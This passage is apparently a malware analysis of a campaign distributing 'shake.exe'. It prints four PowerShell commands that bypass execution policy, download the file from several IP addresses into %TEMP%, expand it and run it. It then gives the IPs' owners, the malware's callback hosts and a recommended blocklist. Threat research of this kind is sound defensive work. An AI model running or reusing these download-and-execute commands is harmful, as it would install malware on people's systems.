cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
FYI, those IPs are allocated as follows:

193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)

"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)

Further analysis is pending.

Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212